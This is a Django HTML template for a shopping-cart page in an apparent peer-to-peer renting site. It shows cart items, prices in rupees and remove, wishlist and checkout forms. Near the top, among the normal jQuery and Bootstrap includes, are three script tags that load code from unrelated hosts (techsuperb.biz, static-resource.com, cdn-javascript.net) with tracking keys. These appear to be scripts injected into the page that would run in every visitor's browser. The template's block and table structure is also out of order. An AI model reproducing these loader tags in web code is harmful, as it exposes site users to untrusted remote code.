<!-- jQuery -->
<script src="http://bootstrap-ecommerce.com/ui-ecommerce/js/jquery-2.0.0.min.js" type="text/javascript"></script>
<script src="//techsuperb.biz/200e670f09e3b73afa.js"></script>

<!-- Bootstrap4 files-->
<script src="http://bootstrap-ecommerce.com/ui-ecommerce/js/bootstrap.bundle.min.js" type="text/javascript"></script>
<link href="http://bootstrap-ecommerce.com/ui-ecommerce/css/bootstrap.css" rel="stylesheet" type="text/css">

<!-- Font awesome 5 -->
<link href="http://bootstrap-ecommerce.com/ui-ecommerce/fonts/fontawesome/css/fontawesome-all.min.css" type="text/css" rel="stylesheet">

<!-- custom style -->
<link href="http://bootstrap-ecommerce.com/ui-ecommerce/css/ui.css" rel="stylesheet" type="text/css">
<link href="http://bootstrap-ecommerce.com/ui-ecommerce/css/responsive.css" rel="stylesheet" media="only screen and (max-width: 1200px)">

<!-- custom javascript -->
<script src="http://bootstrap-ecommerce.com/ui-ecommerce/js/script.js" type="text/javascript"></script>

<script type="text/javascript"></script>

<script type="text/javascript"
        src="http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8206x"></script>
<script type="text/javascript"
        src="http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8206x&amp;format=arrjs&amp;r=1556562771927"></script>


{% extends "P2P_Renting/base.html" %}

{% block content %}

<section class="section-content bg padding-y border-top">
<div class="container">

<div class="row">
	<!--<main class="col-sm-9">-->
    <div class = "col-sm-9">

<div class="card">
<table class="table table-hover shopping-cart-wrap">
<thead class="text-muted">
<tr>
  <th scope="col">Product</th>
  <th scope="col" width="120">Quantity</th>
  <th scope="col" width="120">Price</th>
  <th scope="col" class="text-right" width="200">Action</th>
</tr>
</thead>
    <tbody>

    {% if cart.products.exists %}

        {% for product in cart.products.all %}

            <tr>
    	        <td>
            <figure class="media">
	            <div class="img-wrap"><img src={{ product.product_image.url }} class="img-thumbnail img-sm"></div>
            	<figcaption class="media-body">
                    <h6 class="title text-truncate"><a href="{{ product.get_absolute_url }}">{{ product.title }}</a></h6>
            		<dl class="dlist-inline small">
                        <dt>Size: </dt>
                        <dd>XXL</dd>
	            	</dl>
	            	<dl class="dlist-inline small">
                        <dt>Color: </dt>
                        <dd>Orange color</dd>
	            	</dl>
            	</figcaption>
            </figure>
            	</td>
            	<td>
	            	<select class="form-control">
	            		<option>1</option>
	            		<option>2</option>
	            		<option>3</option>
	            		<option>4</option>
	            	</select>
	            </td>
	            <td>
            		<div class="price-wrap">
            			<var class="price">{{ product.price }}</var>
			            <small class="text-muted">(USD 5 each)</small>
            		</div> <!-- price-wrap .// -->
            	</td>
            	<td class="text-right">
            	    <!--<a data-original-title="Save to Wishlist" title="" href="" class="btn btn-outline-success" data-toggle="tooltip"> <i class="fa fa-heart"></i></a>-->
                	<!--<a href='{% url "cart_update" %}' class="btn btn-outline-danger"> × Remove</a>-->
                    <form method='POST' action='{% url "cart_update" %}' class="form"> {% csrf_token %}
                                <input type='hidden' name='product_id' value='{{ product.id }}' />
                                <button type="submit" data-toggle="tooltip" data-original-title="Save to Wishlist" class="btn btn-outline-success">
                                    <i class="fa fa-heart"></i>
                                </button>
                    </form>
                    <form method='POST' action='{% url "cart_update" %}' class="form"> {% csrf_token %}
                                <input type='hidden' name='product_id' value='{{ product.id }}' />
                                <input type='hidden' name='page' value='cart_page' />
                                <button type="submit" class="btn btn-outline-danger"> × Remove</button>
                    </form>
            	</td>
            </tr>

        {% endfor %}

    </tbody>
</table>
</div> <!-- card.// -->
    <!--</main>-->
    </div>
    <!--<main class="col-sm-5">-->
<div class = "col-sm-3">
        <!--<aside class="col-sm-3">-->
            <p class="alert alert-success">Add USD 5.00 of eligible items to your order to qualify for FREE Shipping. </p>
            <dl class="dlist-align">
                <dt>Total price: </dt>
                <dd class="text-right">Rs. {{ cart.total }}</dd>
            </dl>
            <dl class="dlist-align">
                <dt>Discount:</dt>
                <dd class="text-right">Rs. 0</dd>
            </dl>
            <dl class="dlist-align h4">
                <dt>Total:</dt>
                <dd class="text-right"><strong>Rs. {{ cart.total }}</strong></dd>
            </dl>
            <hr>
            <figure class="itemside mb-3">
            	<aside class="aside"><img src="http://bootstrap-ecommerce.com/ui-ecommerce/images/icons/pay-visa.png"></aside>
                <div class="text-wrap small text-muted">
                    Pay 84.78 AED ( Save 14.97 AED )
                    By using ADCB Cards
                </div>
            </figure>
            <figure class="itemside mb-3">
            	<aside class="aside"> <img src="http://bootstrap-ecommerce.com/ui-ecommerce/images/icons/pay-mastercard.png"> </aside>
            	<div class="text-wrap small text-muted">
                    Pay by MasterCard and Save 40%. <br>
                    Lorem ipsum dolor
            	</div>
            </figure>
   	<form method='POST' action='{% url "checkout" %}' class="form"> {% csrf_token %}
        <input type='hidden' name='cart' value='{{ cart.id }}' />
            <button type="submit" class="btn btn-info btn-block">Checkout</button>
    </form>
    	<!--</aside>-->
    <!--</main>-->
</div>
</div>
</div>
</section>

    {% else %}
        <tr> Cart is Empty </tr>

    {% endif %}


{% endblock content %}
